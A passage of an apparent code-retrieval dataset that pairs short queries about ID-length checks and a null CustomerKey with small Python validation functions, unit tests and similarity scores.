is_valid_control_number(str(id_code)):\n return True\n return False\n return False\n return False", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def validate_identifier(identifier: str) -> bool:\n if identifier[:2] == 'NR':\n return True\n\n if len(identifier) < 9:\n return False\n\n try:\n d = int(identifier[-7:])\n if d == 0:\n return False\n except ValueError:\n return False\n # TODO This is not correct for entity types that are not Coops\n if identifier[:-7] not in ('CP', 'XCP', 'BC'):\n return False\n\n return True", "def validate_passport_id(passport_id: str) -> None:\n if RE_PID.match(passport_id) is None:\n raise ValueError(\"Passport ID is not nine decimal digits\")", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_check_name_is_3_parts():\n check_name_length()", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def validate_identifier(self, identifier):\n pass", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def is_valid_node_id(val):\n if not val:\n return False\n if not isinstance(val, bytes) and not isinstance(val, bytearray):\n return False\n\n length = len(val)\n if length != SHA1_BIN_LEN and length != SHA2_BIN_LEN and \\\n length != SHA3_BIN_LEN:\n return False\n\n return True", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def _checkResponseByteCount(payload):\n POSITION_FOR_GIVEN_NUMBER = 0\n NUMBER_OF_BYTES_TO_SKIP = 1\n\n _checkString(payload, minlength=1, description='payload')\n\n givenNumberOfDatabytes = ord(payload[POSITION_FOR_GIVEN_NUMBER])\n countedNumberOfDatabytes = len(payload) - NUMBER_OF_BYTES_TO_SKIP\n\n if givenNumberOfDatabytes != countedNumberOfDatabytes:\n errortemplate = 'Wrong given number of bytes in the response: {0}, but counted is {1} as data payload length is {2}.' 
+ \\\n ' The data payload is: {3!r}'\n errortext = errortemplate.format(givenNumberOfDatabytes, countedNumberOfDatabytes, len(payload), payload)\n raise ValueError(errortext)", "def test__limit_string_length(string, max_length):\n return limit_string_length(string, max_length)", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def max_length(length):\n def validate(value):\n if len(value) <= length:\n return True\n raise Exception('%s must be at most %s characters long' % length)\n return validate", "def __init__(self, length=DEFAULT_ID_LENGTH, excluded_chars=DEFAULT_EXCLUDED_CHARS):\n self.id_length = length\n self.excluded_chars = excluded_chars", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def is_id(string):\n regex = re.compile('[0-9a-f]{32}\\Z', re.I)\n if bool(regex.match(string)):\n return True\n\n return False", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= self.max_length\n else:\n return True", "def len23(self, len): # -> None:\n ...", "def _create_finding_id(control_id, resource_name, length=20):\n input = control_id + resource_name\n hex = hashlib.sha256(input.encode('UTF-8')).hexdigest()\n result = int(hex, 16) % (10 ** length)\n return str(result)", "def is_valid_pci_class_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 6):\n return False\n return True", "def is_valid_passport_id(passport_id: int) -> bool:\n return len(passport_id) == 9 and passport_id.isnumeric()", "def at_least(length:int) -> str:\n return f\"{{{length},}}\"", "def exactly(length:int) -> str:\n return f\"{{{length}}}\"", "def check_id(id):\n id = id.strip()\n \n if id and id.isdigit(): # id must only be a number\n return id\n else:\n return None", "def _check_id(self, keyword):\n if keyword not in self.request.data:\n return '{} parameter is missing'.format(keyword)\n \"\"\" Check if <keyword> parameter is not None \"\"\"\n if self.request.data[keyword] == '':\n return '{} ID cannot be None'.format(keyword)\n \"\"\" Check if <keyword> parameter is > 0 \"\"\"\n if int(self.request.data[keyword]) < 1:\n return '{} ID must be an integer > 0'.format(keyword)", "def test_maxlength():\n assert has_max_length(None, 2) is None\n assert has_max_length('abcd1234', 2)\n assert has_max_length('a', 2) is None", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def _validate(cls, pid_value):\n blop = re.compile('^[-\\w]+$')\n if not bool(blop.match(pid_value)):\n raise ValidationError(\n 'The ID should contain only letters with numbers or dashes.',\n field_name='id',\n )", "def test_get_uniqueId():\n rep=RentRepository()\n rep.store(\"12\",\"23\",\"1\", \"1\")\n try:\n\n idBook=\"13\"\n idCustomer=\"54\"\n flag=\"1\"\n id=\"1\"\n Validator.get_uniqueId(rep.get_all(),id)\n assert False\n\n except RepositoryExceptionRent as msg:\n assert True", "def verify(s):\n\t# Remove any spurious 
characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def _is_validation(video_id):\n hasher = md5()\n hasher.update(bytes(video_id, 'utf-8'))\n first = hasher.hexdigest()[0]\n return first in ['0', '1']", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def _generate_cart_id():\n cart_id = ''\n characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()'\n cart_id_length = 50\n for y in range(cart_id_length):\n cart_id += characters[random.randint(0, len(characters) - 1)]\n return cart_id", "def fromOnceID(once_id):\n if not isinstance( once_id, (str) ) or once_id == '':\n return None\n id_split = list(once_id)\n val = 0\n while(len(id_split) > 0):\n char_val = ONCEB50.index( id_split.pop(0) )\n val += char_val * (ONCESIZE ** len(id_split))\n return val", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def test_utils_random_string(self, tcex, string_length):\n result = tcex.utils.random_string(string_length=string_length)\n assert (\n len(result) == string_length\n ), f'The length of the string {len(result)} != {string_length}'", "def generate_id(self):\n unique_id = \"\"\n\n while len(unique_id) < self.id_length:\n ascii_number = self.get_random_bits()\n\n if self.is_approved_ascii(ascii_number):\n random_char = chr(ascii_number)\n\n if not self.is_excluded_char(random_char):\n unique_id += chr(ascii_number)\n\n return unique_id", "def my_random_string(string_length=7):\n flag = False\n while flag == False:\n random = str(uuid.uuid4()) # Convert UUID format to a Python string.\n random = random.upper() # Make all characters uppercase.\n random = random.replace(\"-\",\"\") # Remove the UUID '-'.\n my_hash = random[0:string_length]\n duplicate_check = PasswordResetRequest.objects.filter(hash=my_hash)\n if not duplicate_check:\n return my_hash\n break; #although code will never reach here :)", "def test_get_length_of_transcript(self):\n assert self.icd.get_length_of_transcript(\"ENST00000373656\") == 4441\n assert self.icd.get_length_of_transcript(\"ENST00000373654\") == 2045\n assert self.icd.get_length_of_transcript(\"ENST00000337451\") == 3225\n assert self.icd.get_length_of_transcript(\"ENST00000398013\") == 2274" ]
[ "0.70664537", "0.68608546", "0.6378098", "0.6287845", "0.62220454", "0.6160857", "0.6048363", "0.60367453", "0.6018999", "0.59948397", "0.59662354", "0.59309196", "0.5913995", "0.5907712", "0.58846974", "0.58698547", "0.5848623", "0.58164203", "0.5786315", "0.57850075", "0.57811594", "0.57596517", "0.5747777", "0.574281", "0.5740685", "0.572512", "0.57084656", "0.570403", "0.5691527", "0.5672023", "0.56690705", "0.5667142", "0.5640593", "0.5621434", "0.55936", "0.5580656", "0.5580332", "0.557957", "0.5568601", "0.55681664", "0.55674064", "0.55672425", "0.556489", "0.55614084", "0.55572444", "0.55403346", "0.55389017", "0.5535977", "0.55225205", "0.55215055", "0.55181473", "0.55176985", "0.5514764", "0.5513978", "0.55099434", "0.54981136", "0.54857665", "0.54804945", "0.54791605", "0.5469561", "0.5460033", "0.54599094", "0.54490364", "0.54394186", "0.5438826", "0.5432116", "0.54244494", "0.5422934", "0.5402576", "0.54022706", "0.5395745", "0.5395507", "0.53935057", "0.5390733", "0.538767", "0.538664", "0.5386381", "0.5381631", "0.53774834", "0.5372438", "0.5356957", "0.53546864", "0.5348569", "0.534652", "0.5346459", "0.5341466", "0.5333561", "0.5333119", "0.5330498", "0.5329882", "0.53235656", "0.5303961", "0.52961844", "0.5290879", "0.5288708", "0.52849585", "0.52845645", "0.52817875", "0.52815473", "0.527852", "0.5278165" ]
0.0
-1
Check length of PaytureId (len = 51)
def test_43(self): assert 'False' == Api.requestBlock('test-43')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validateID(id):\n\n if re.compile('[0-9]+').match(id) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' is not a valid Id. ID should be numeric with Length = '%s' \" \n\t\t\t% (id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n # Check for the lenght \n counter = 0\n for char in id:\n counter += 1\n print counter , lib.constants._ATTR_ID_LENGHT\n if counter > lib.constants._ATTR_ID_LENGHT :\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' exceeded the given length i.e Max Length = '%s'\" % \n\t\t\t(id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n return 0\n return 0", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def payment_id_lengths(self) -> Set[int]:", "def payment_id_leading(self) -> bool:", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def __len__(self):\n return len(self.token2id)", "def checkValidId(self, id, prep_id = False):\n # RRD docs say that limit on vnames is 255 characters and that\n # A-Za-z0-9_ are the valid characters. Zenoss reserves - for it's own\n # use. 
Limiting to 200 instead just to leave room for whatever.\n # http://oss.oetiker.ch/rrdtool/doc/rrdgraph_data.en.html\n if len(id) > 200:\n return 'GraphPoint names can not be longer than 200 characters.'\n allowed = set(string.ascii_letters + string.digits + '_')\n attempted = set(id)\n if not attempted.issubset(allowed):\n return 'Only letters, digits and underscores are allowed' + \\\n ' in GraphPoint names.'\n return ZenModelRM.checkValidId(self, id, prep_id)", "def isValid(t_id):\n\tstr_id=str(t_id).strip()\n\treturn str_id.isdigit()", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def test_get_shortuuid_uuid(self):\n id = get_shortuuid()\n self.assertTrue(len(id) == 22)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def len12(self, len): # -> None:\n ...", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def validate_crx_id(crx_id):\n try:\n assert isinstance(crx_id, str)\n assert crx_id.isalnum()\n assert len(crx_id) == 32\n except AssertionError:\n raise MalformedExtId", "def _validate_bbg_id(x):\n return len(x) == 12 and x[:3] == 'BBG' and str.isalnum(x[3:11]) and sum(map(\n lambda u: u in ['A', 'E', 'I', 'O', 'U'], x[3:11])) == 0 and str.isdigit(x[11])", "def vet_pdb_id(pdbid):\n if len(pdbid) < 4 or not \\\n pdbid.isalnum() or not \\\n re.match(r'^[0-9][A-Za-z0-9]{3}$', pdbid):\n return False\n return True", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def checkValidId(self, id, prep_id = False):\n new_id = unquote(id)\n if prep_id: new_id = self.prepId(id)\n try:\n globalCheckValidId(self, new_id)\n return True\n except Exception:\n return str(sys.exc_info()[1])", "def validateIOmoduleId(output ,arg_dict , key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric \" % (key,id))) \n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. 
\\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def id_check(employee_id):\r\n# badge_pattern = re.compile('[A-Za-z]{2}-\\d{4}')\r\n# re.search(badge_pattern, employee_id)\r\n\r\n # if statement\r\n if not re.match('[A-Z]{2}-\\d{4}', employee_id):\r\n print(employee_id, 'is not a valid ID.')", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def check_id(self, id):", "def validate_identifier(identifier: str) -> bool:\n if identifier[:2] == 'NR':\n return True\n\n if len(identifier) < 9:\n return False\n\n try:\n d = int(identifier[-7:])\n if d == 0:\n return False\n except ValueError:\n return False\n # TODO This is not correct for entity types that are not Coops\n if identifier[:-7] not in ('CP', 'XCP', 'BC'):\n return False\n\n return True", "def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)", "def fill_id(id):\n if len(str(id)) < 7:\n length = len(str(id))\n id = \"0\"*(7 - length) + str(id)\n return str(id)", "def validateVfabric(output ,arg_dict, key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' = '%s' is not a valid Id. ID should be numeric \" % \n\t\t\t\t(key,id)))\n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n\t output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. 
\\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def bad_substring_check_account(self, google_ads_account_id):\n pass", "def is_valid_node_id(val):\n if not val:\n return False\n if not isinstance(val, bytes) and not isinstance(val, bytearray):\n return False\n\n length = len(val)\n if length != SHA1_BIN_LEN and length != SHA2_BIN_LEN and \\\n length != SHA3_BIN_LEN:\n return False\n\n return True", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def check4Id(self, element):\n if self.__identifier in element.attrib:\n return True\n else:\n return False", "def is_id_valid(id_code: str) -> bool:\n if is_valid_gender_number(int(id_code[0:1])):\n if is_valid_year_number(int(id_code[1:3])):\n if is_valid_month_number(int(id_code[3:5])):\n if is_valid_day_number(int(id_code[0:1]), int(id_code[1:3]), int(id_code[3:5]), int(id_code[5:7])):\n if is_valid_birth_number(int(float(id_code[7:10]))):\n if is_valid_control_number(id_code):\n return True\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n else:\n return False", "def test_split_id_otp(self):\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"ft\" * 16)\n self.assertEqual(public_id, '')\n self.assertEqual(otp, \"ft\" * 16)\n\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"cc\" + \"ft\" * 16)\n self.assertEqual(public_id, 'cc')\n self.assertEqual(otp, \"ft\" * 16)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def _check_subject_id(subject_id):\n if (subject_id and\n len(subject_id) > models.Subject.id.property.columns[\n 0].type.length):\n raise exception.SubjectNotFound()", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def _check_max_length(self, p: list) -> bool:\n\n return (\n len(p[0].split(\" \")) < self.max_length\n and len(p[1].split(\" \")) < self.max_length\n )", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def is_id_valid(id_code: str) -> bool:\n if id_code.isdigit():\n if len(str(id_code)) == 11:\n id_code = str(id_code)\n gender_number = int(id_code[0:1])\n day = int(id_code[5:7])\n month = int(id_code[3:5])\n year = id_code[1:3]\n birth_number = id_code[7:10]\n if is_valid_gender_number(gender_number) \\\n and is_valid_year_number(int(year)) \\\n and is_valid_month_number(int(month)) \\\n and is_valid_day_number(gender_number, int(year), int(month), int(day)) \\\n and is_valid_birth_number(int(birth_number)) \\\n and is_valid_control_number(str(id_code)):\n return True\n return False\n return False\n return False", "def is_valid_pci_class_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 6):\n return False\n return True", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def min_length(verifield, required):\n if 
verifield is None: return True\n return len(verifield) >= required", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_longest_id(self):\r\n ids = \\\r\n \"R27DLI_4812 R27DLI_600 R27DLI_727 U1PLI_403 U1PLI_8969\".split(\r\n )\r\n seqs = dict(parse_fasta(dna_seqs.splitlines(),\r\n label_to_name=label_to_name))\r\n self.assertEqual(longest_id(ids, seqs), 'U1PLI_403')", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def validate_passport_id(passport_id: str) -> None:\n if RE_PID.match(passport_id) is None:\n raise ValueError(\"Passport ID is not nine decimal digits\")", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def len23(self, len): # -> None:\n ...", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def validate_identifier(self, identifier):\n pass", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def generate_id(length: int = 8):\n return \"\".join(random.choices(string.ascii_uppercase, k=length))", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def is_id(string):\n regex = re.compile('[0-9a-f]{32}\\Z', re.I)\n if bool(regex.match(string)):\n return True\n\n return False", "def _checkResponseByteCount(payload):\n POSITION_FOR_GIVEN_NUMBER = 0\n NUMBER_OF_BYTES_TO_SKIP = 1\n\n _checkString(payload, minlength=1, description='payload')\n\n givenNumberOfDatabytes = ord(payload[POSITION_FOR_GIVEN_NUMBER])\n countedNumberOfDatabytes = len(payload) - NUMBER_OF_BYTES_TO_SKIP\n\n if givenNumberOfDatabytes != countedNumberOfDatabytes:\n errortemplate = 'Wrong given number of bytes in the response: {0}, but counted is {1} as data payload length is {2}.' 
+ \\\n ' The data payload is: {3!r}'\n errortext = errortemplate.format(givenNumberOfDatabytes, countedNumberOfDatabytes, len(payload), payload)\n raise ValueError(errortext)", "def len_unpadded(self) -> int:", "def check_input_digits_count(self):\n check = len(str(self.input)) == 4\n return check", "def randid(length=12):\n\timport random\n\treturn ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for x in range(length))", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_id():\n assert Packet40.id == 40", "def PassportIDTest(pid):\n\tif len(pid) == 9:\n\t\tif pid.isdigit():\n\t\t\treturn True\n\treturn False", "def validateId(shortId):\n return shortId in [DockerUtil.getShortId(container) for container in DOCKER_CLIENT.containers.list()]", "def is_valid_passport_id(passport_id: int) -> bool:\n return len(passport_id) == 9 and passport_id.isnumeric()", "def getUIDValidity(self):\n return 42", "def test_check_name_is_3_parts():\n check_name_length()", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.MessageDataset())) == 138737", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def _is_validation(video_id):\n hasher = md5()\n hasher.update(bytes(video_id, 'utf-8'))\n first = hasher.hexdigest()[0]\n return first in ['0', '1']", "def _create_finding_id(control_id, resource_name, length=20):\n input = control_id + resource_name\n hex = hashlib.sha256(input.encode('UTF-8')).hexdigest()\n result = int(hex, 16) % (10 ** length)\n return str(result)", "def is_order_id_valid(self):\n \n if not self.order_id:\n self.error_message = jsonify({'status':'error', 'message': 'orderId parameter missing'})\n return False\n if not re.match('^[a-f0-9]{32}$', self.order_id):\n self.error_message = jsonify({'status': 'error', 'message': 'orderId must be set to (hex) UUID'})\n return False\n return True", "def check_id(id):\n id = id.strip()\n \n if id and id.isdigit(): # id must only be a number\n return id\n else:\n return None", "def test_valid_luhn(self):\n assert luhn_checksum(\"79927398713\") == 0", "def is_valid_pci_device_vendor_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 4):\n return False\n return True", "def Length(self) -> int:", "def Length(self) -> int:", "def _validate_identifier(self, identifier):\n for c in identifier:\n if c not in string.letters + string.digits + '_':\n return False\n return True", "def test_get_length_of_transcript(self):\n assert 
self.icd.get_length_of_transcript(\"ENST00000373656\") == 4441\n assert self.icd.get_length_of_transcript(\"ENST00000373654\") == 2045\n assert self.icd.get_length_of_transcript(\"ENST00000337451\") == 3225\n assert self.icd.get_length_of_transcript(\"ENST00000398013\") == 2274", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def test_minlength():\n assert has_min_length(None, 8) is None\n assert has_min_length('abcd1234', 8) is None\n assert has_min_length('a', 8)", "def verify(s):\n\t# Remove any spurious characters\n\ts = re.sub(r'[^0-9xX]', '', s).upper().strip()\n\n\tl = len(s)\n\n\tif l==10:\n\t\tif verify_10(s):\n\t\t\treturn s\n\telif l==13:\n\t\tif verify_13(s):\n\t\t\treturn s\n\n\t# It's not the right length to be an ISBN\n\treturn False", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))", "def test_has_correct_length(self) -> None:\n assert len(list(self._dataset)) == 7168", "def _validate(cls, pid_value):\n blop = re.compile('^[-\\w]+$')\n if not bool(blop.match(pid_value)):\n raise ValidationError(\n 'The ID should contain only letters with numbers or dashes.',\n field_name='id',\n )", "def generate_id(self):\n unique_id = \"\"\n\n while len(unique_id) < self.id_length:\n ascii_number = self.get_random_bits()\n\n if self.is_approved_ascii(ascii_number):\n random_char = chr(ascii_number)\n\n if not self.is_excluded_char(random_char):\n unique_id += chr(ascii_number)\n\n return unique_id", "def test_get_uniqueId():\n rep=RentRepository()\n rep.store(\"12\",\"23\",\"1\", \"1\")\n try:\n\n idBook=\"13\"\n idCustomer=\"54\"\n flag=\"1\"\n id=\"1\"\n Validator.get_uniqueId(rep.get_all(),id)\n assert False\n\n except RepositoryExceptionRent as msg:\n assert True", "def __init__(self, length=DEFAULT_ID_LENGTH, excluded_chars=DEFAULT_EXCLUDED_CHARS):\n self.id_length = length\n self.excluded_chars = excluded_chars", "def test_id_centos_7_7(self):\n self.assertEqual(jc.parsers.id.parse(self.centos_7_7_id, quiet=True), self.centos_7_7_id_json)" ]
[ "0.69983447", "0.68838894", "0.6375329", "0.6372531", "0.62937874", "0.62633044", "0.61286795", "0.6075512", "0.60735387", "0.60325694", "0.5966721", "0.5952522", "0.59324026", "0.5905336", "0.58905697", "0.58616316", "0.5856024", "0.58352464", "0.583216", "0.58215785", "0.5816491", "0.581104", "0.5802702", "0.57943374", "0.57598126", "0.57566875", "0.57410175", "0.5737227", "0.57282865", "0.57142174", "0.56757265", "0.5638335", "0.5634978", "0.5615788", "0.56131303", "0.5612519", "0.56065655", "0.5581505", "0.55686027", "0.55626225", "0.5562309", "0.5560139", "0.5558599", "0.555765", "0.5557457", "0.5538825", "0.553538", "0.55321616", "0.55166596", "0.5511475", "0.55055076", "0.5492686", "0.54917526", "0.5488949", "0.54811615", "0.54802626", "0.5468472", "0.54651964", "0.54620415", "0.54608995", "0.5460116", "0.5459854", "0.54572046", "0.54459023", "0.54402107", "0.5436092", "0.54254717", "0.5425391", "0.5424836", "0.5423198", "0.5422093", "0.54149723", "0.5409126", "0.54080594", "0.54076713", "0.5391526", "0.53907275", "0.5387764", "0.5383652", "0.53793985", "0.53773654", "0.537215", "0.5371936", "0.53705204", "0.5364924", "0.536217", "0.53535014", "0.53535014", "0.5348609", "0.53432816", "0.53417563", "0.5341697", "0.53404826", "0.5339914", "0.5335248", "0.5333534", "0.533242", "0.53214395", "0.5320829", "0.5308691", "0.530356" ]
0.0
-1
Send null value in CustomerKey
def test_44(self): assert 'False' == Api.requestBlock('test-44')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
